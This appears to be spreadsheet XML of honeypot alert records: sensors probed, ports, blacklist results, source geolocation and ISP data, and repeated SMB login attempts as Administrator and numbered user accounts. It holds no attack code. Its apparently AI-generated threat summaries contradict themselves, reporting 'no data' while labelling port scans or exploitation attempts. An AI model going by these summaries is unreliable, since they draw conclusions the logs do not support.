    <s v="No data provided, therefore there is no activity to analyze. &amp;&amp; No malicious activity detected based on provided log data. &amp;&amp; No log data provided, therefore unable to analyze or describe any possible malicious activity. &amp;&amp; The log indicates that no TELNET activity was detected during this monitoring period which is unusual as many malicious scans often check for open TELNET ports. This could be a sign of normal network traffic or possibly an evasion tactic where the attacker didn't probe for TELNET access. The lack of detection might not necessarily mean there's no threat but it could suggest that the attack vector was not exploited this time around. &amp;&amp; No log data provided, unable to analyze. &amp;&amp; No log data is provided, so there's nothing to analyze or describe."/>
    <s v="I'm ready when you are. Please provide the log data, and I'll analyze it accordingly. &amp;&amp; I'd be happy to help, but I need some log data to work with. Please provide the log data from the honeypot and I'll analyze it for you._x000a__x000a_Once you provide the log data, I'll:_x000a__x000a_* Name the type of attack in a short phrase (max 2 words). &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="577"/>
    <x v="577"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T13:02:25"/>
    <d v="2025-04-28T13:02:25"/>
    <d v="2025-04-28T13:02:25"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Palakkad"/>
    <s v="Palakkad"/>
    <s v="1260728"/>
    <s v="NA"/>
    <s v="10.7732"/>
    <s v="76.6537"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:1f7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No recent TELNET activity was detected, indicating that this service has been idle or not targeted by any potential malicious actors so far. &amp;&amp; No TELNET activity detected, indicating a potential attempt to exploit or scan for vulnerabilities."/>
    <s v="Brute Scan &amp;&amp; Port Scanning"/>
  </r>
  <r>
    <x v="578"/>
    <x v="578"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T13:01:49"/>
    <d v="2023-11-27T10:40:15"/>
    <d v="2025-04-28T13:01:49"/>
    <n v="178"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_SSH_H4&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;22&amp;&amp;6889&amp;&amp;15667&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Ahmadabad"/>
    <s v="Ahmedabad (Vasant Vihar)"/>
    <s v="1279233"/>
    <s v="380001"/>
    <s v="23.0334"/>
    <s v="72.558"/>
    <s v="17625"/>
    <s v="Blazenet Pvt Ltd"/>
    <s v="BlazeNet"/>
    <s v="business"/>
    <s v="Blazenet Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b6d:b42"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="579"/>
    <x v="579"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T12:35:43"/>
    <d v="2025-04-28T12:35:43"/>
    <d v="2025-04-28T12:35:43"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:c5d9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="580"/>
    <x v="580"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T12:28:32"/>
    <d v="2024-03-29T14:12:43"/>
    <d v="2025-04-28T12:28:32"/>
    <n v="862"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_SMB_H22&amp;&amp;SMA-LAB_IPP_H28&amp;&amp;SMA-LAB_SOCKS5_H1&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_VNC_H28&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_IRC_H37&amp;&amp;SMA-LAB_HTTPS_H12&amp;&amp;SMA-LAB_SSH_H35&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_IPP_H25&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_ORACLE_H42&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_SIP_H23&amp;&amp;SMA-LAB_HTTPS_H18&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="47792&amp;&amp;23&amp;&amp;445&amp;&amp;631&amp;&amp;1080&amp;&amp;389&amp;&amp;5900&amp;&amp;9100&amp;&amp;6667&amp;&amp;443&amp;&amp;22&amp;&amp;46571&amp;&amp;6379&amp;&amp;631&amp;&amp;1080&amp;&amp;1521&amp;&amp;5900&amp;&amp;9100&amp;&amp;5060&amp;&amp;443&amp;&amp;3389&amp;&amp;40246&amp;&amp;NA&amp;&amp;57018&amp;&amp;18646"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.874600000000001"/>
    <s v="74.8486"/>
    <s v="135774"/>
    <s v="MANGALURU BROADBAND NETWORK PRIVATE LIMITED"/>
    <s v="Mangaluru Broadband Network Private Limited"/>
    <s v="residential"/>
    <s v="Mangaluru Broadband Network Private Limited"/>
    <s v="2022-02-23"/>
    <s v="MBNL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67b6:7d37"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data available for analysis. _x000a__x000a_This means there is currently no information about possible malicious activity to examine, making it impossible to draw any conclusions or identify potential security threats. &amp;&amp; The telnet service is being accessed, possibly indicating unauthorized access or reconnaissance attempts to gather information about system services. This could be an initial step by malicious actors before attempting more severe attacks. The absence of data suggests a potential probing activity rather than a successful connection."/>
    <m/>
  </r>
  <r>
    <x v="581"/>
    <x v="581"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T12:18:03"/>
    <d v="2024-03-15T23:18:29"/>
    <d v="2025-04-28T12:18:03"/>
    <n v="135"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_IRC_H30&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_HTTPS_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;80&amp;&amp;15205&amp;&amp;51320&amp;&amp;6667&amp;&amp;1433&amp;&amp;53964&amp;&amp;54578&amp;&amp;443&amp;&amp;53304&amp;&amp;55477&amp;&amp;52840&amp;&amp;55288&amp;&amp;55459&amp;&amp;110&amp;&amp;50972"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_IRC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:853c"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This log entry suggests that there was an attempt to initiate a malicious IRC (Internet Relay Chat) communication, likely for spreading malware or conducting further attacks. The IRC protocol is often exploited by attackers for command and control purposes. &amp;&amp; Possible malicious activity involves an unknown entity attempting to use Internet Relay Chat (IRC) services, with no data received indicating further action or interaction was made. The IRC attempt may be related to spreading malware, conducting reconnaissance, or facilitating communication among malicious actors. No further information is available due to the lack of received data."/>
    <m/>
  </r>
  <r>
    <x v="582"/>
    <x v="582"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T12:14:52"/>
    <d v="2025-04-28T12:14:52"/>
    <d v="2025-04-28T12:14:52"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5d:ee53"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The telnet service is being accessed but its status remains unknown._x000a_This could indicate an attempt to scan or exploit vulnerabilities in the system._x000a_It may also suggest that the attacker is probing for open ports or services. &amp;&amp; No TELNET activity was detected, suggesting an attempt to exploit this service may have been made but it did not result in a connection. No malicious activity through TELNET protocol has been recorded. This could indicate that the service is either down or well-configured security measures prevented unauthorized access."/>
    <m/>
  </r>
  <r>
    <x v="583"/>
    <x v="583"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T12:11:06"/>
    <d v="2023-09-09T10:51:00"/>
    <d v="2025-04-28T12:11:06"/>
    <n v="447"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SMB_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49256)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49298)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,62496)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,62956)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,62874)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59195)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59304)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59387)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59534)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59626)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59708)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59856)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59999)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,60179)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,60347)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,60472)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,60565)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,64725)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user5,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,64749)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user5,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,65331)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user5,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49270)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49306)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49331)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49357)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49392)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49427)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49445)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49472)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49501)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49527)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49553)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49586)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49630)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49662)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49698)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49723)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51133)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51168)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51200)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51231)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51261)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51289)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51323)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51358)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51520)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51548)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51559)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51592)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51622)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user6,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51652)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user7,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51677)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user7,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51701)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user7,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51731)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user7,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51754)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user7,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,52100)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user7,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,52761)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (user7,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,52804)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59215)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59560)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59919)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59974)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,61931)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,62729)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,52315)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,54988)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,57172)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,60850)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,61043)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,61625)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,65406)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,49231)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,50247)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51515)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51621)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,53282)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,53464)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,53737)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,54025)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,54286)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,54540)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,54644)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,54740)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,58385)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59821)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,60104)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,60446)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,60678)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,60858)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,61114)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,51458)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (115.96.27.126,59127)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE 